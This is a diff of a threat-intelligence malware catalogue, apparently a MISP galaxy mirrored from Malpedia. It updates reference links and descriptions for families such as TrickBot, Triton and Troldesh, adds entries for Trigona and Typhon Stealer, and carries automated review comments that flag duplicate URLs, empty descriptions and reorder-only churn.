+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.ic3.gov/Media/News/2022/220120.pdf",
+ "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
+ "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
+ "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
+ "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
+ "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
+ "https://community.riskiq.com/article/298c9fc9",
+ "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
+ "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass",
+ "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
+ "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
+ "https://www.mandiant.com/media/12596/download",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.joesecurity.org/blog/498839998833561473",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
+ "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/",
+ "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
+ "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
+ "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
+ "https://blog.cyberint.com/ryuk-crypto-ransomware",
+ "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/",
+ "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
"https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
+ "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/",
+ "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
+ "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.youtube.com/watch?v=lTywPmZEU1A",
+ "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
+ "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity",
+ "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
+ "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://intel471.com/blog/conti-leaks-ransomware-development",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
+ "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages",
+ "https://www.justice.gov/opa/press-release/file/1445241/download",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
+ "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/",
+ "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/",
+ "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
+ "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
+ "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
+ "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
+ "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
+ "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
+ "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/",
+ "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://share.vx-underground.org/Conti/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
+ "https://www.youtube.com/watch?v=Brx4cygfmg8",
+ "https://duo.com/decipher/trickbot-up-to-its-old-tricks",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://twitter.com/VK_Intel/status/1328578336021483522",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/",
+ "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/",
+ "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/",
+ "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/"
],
"synonyms": [
"TheTrick",
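Review bot: the regenerated TrickBot `refs` list contains several entries that point at the same resource under a slightly different URL, so the deduplication in the generator is comparing raw strings rather than normalized URLs. Visible pairs in this hunk: `"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"` and the same path without the trailing slash; `"http://www.secureworks.com/research/threat-profiles/gold-blackburn"` alongside the `https://` form; and `"https://www.wired.com/story/trickbot-malware-group-internal-messages/"` next to the wired.co.uk copy of the same article. Normalizing scheme, host and trailing slash before the uniqueness check would drop these, and a stable sort of the list would also stop previously present references (for example the hhs.gov bazarloader PDF and the gold-swathmore profile) from showing up as removed and re-added in the same hunk.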
@@ -45529,29 +47974,44 @@
"uuid": "c824813c-9c79-4917-829a-af72529e8329",
"value": "TrickBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d5e900b0-5a6d-4e29-ab64-fa72863198a1",
+ "value": "Trigona"
+ },
{
"description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
- "https://www.eenews.net/stories/1060123327/",
- "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
- "https://dragos.com/blog/trisis/TRISIS-01.pdf",
- "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.ic3.gov/Media/News/2022/220325.pdf",
- "https://home.treasury.gov/news/press-releases/sm1162",
- "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
- "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security"
+ "https://www.eenews.net/stories/1060123327/",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
+ "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://www.ic3.gov/Media/News/2022/220325.pdf",
+ "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
+ "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
+ "https://home.treasury.gov/news/press-releases/sm1162",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf"
],
"synonyms": [
"HatMan",
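Review bot: the new Trigona entry is added with `"description": ""`, which leaves the cluster without any human-readable text in the galaxy; either carry over a one-line summary from the Malpedia page it references or omit the key rather than committing an empty string. In the Triton block, the only genuinely new reference is `"https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics"`, which by its title concerns FIN11 emulation rather than Triton/Trisis or its SIS targeting, so it should be confirmed as belonging to this cluster before merge; the remaining lines in that block are the existing references in a different order.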
@@ -45567,20 +48027,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
+ "https://github.com/5loyd/trochilus/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
- "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/5loyd/trochilus/"
+ "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf"
],
"synonyms": [],
"type": []
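Review bot: this hunk only reorders the Trochilus RAT refs, with nothing added or removed, and the same pattern repeats in many hunks below (TurnedUp, TypeHash, UDPoS, URLZone, USBCulprit, Vadokrist, Vermin and others). If the generator writes refs in whatever order Malpedia currently returns them, sorting the list before serialising would make future diffs show only real changes; as it stands a reviewer has to compare each list by hand to confirm no ref was dropped.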
@@ -45589,19 +48049,19 @@
"value": "Trochilus RAT"
},
{
- "description": "",
+ "description": "According to Malwarebyte, Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access. Ransom.Troldesh is spread by malspam, typically in the form of attached .zip files. This ransomware sometimes uses a CMS on a compromised site to host downloads.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
- "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/",
- "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
- "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
- "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/",
- "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
- "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/",
- "https://support.kaspersky.com/13059",
"https://blog.avast.com/ransomware-strain-troldesh-spikes",
"https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/",
+ "https://support.kaspersky.com/13059",
+ "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
+ "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/",
+ "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/",
+ "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/",
+ "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
+ "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
"https://github.com/shade-team/keys",
"https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/"
],
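Review bot: the new Troldesh description opens with "According to Malwarebyte"; the vendor is Malwarebytes. The next sentence is also a generic definition of ransomware rather than anything about Troldesh, and only the last two sentences describe the family. Suggest at least the spelling fix, e.g. `"description": "According to Malwarebytes, Ransom.Troldesh is spread by malspam, typically in the form of attached .zip files. ..."`.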
@@ -45681,8 +48141,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turian",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
- "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day"
+ "https://unit42.paloaltonetworks.com/playful-taurus/",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/"
],
"synonyms": [],
"type": []
@@ -45709,9 +48170,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc",
"https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
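Review bot: the three cocomelonc.github.io "malware-pers-*" links added to the Turla RPC refs are generic persistence-technique tutorials rather than analyses of this family; the same applies to the malware-pers-7 link added to Turla SilentMoon and the simple-malware-av-evasion-2 link added to Unidentified 090 further down. If Malpedia lists them upstream the generator is only mirroring that, but it is worth checking that these posts actually cite the family before they are propagated into the galaxy as references.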
@@ -45724,10 +48188,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://twitter.com/Arkbird_SOLG/status/1304187749373800455",
"https://www.emanueledelucia.net/the-bigboss-rules-something-about-one-of-the-uroburos-rpc-based-backdoors/",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://twitter.com/Arkbird_SOLG/status/1304187749373800455"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"BigBoss",
@@ -45745,11 +48210,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup",
- "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/",
- "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
],
"synonyms": [
"Notestuk"
@@ -45764,8 +48229,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash",
- "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf"
],
"synonyms": [
"SkinnyD"
@@ -45775,6 +48240,21 @@
"uuid": "d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e",
"value": "TypeHash"
},
+ {
+ "description": "According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.typhon_stealer",
+ "https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/"
+ ],
+ "synonyms": [
+ "Typhon Reborn V2"
+ ],
+ "type": []
+ },
+ "uuid": "fb5e364c-0f91-4b35-89cc-52eb4fc2a338",
+ "value": "Typhon Stealer"
+ },
{
"description": "",
"meta": {
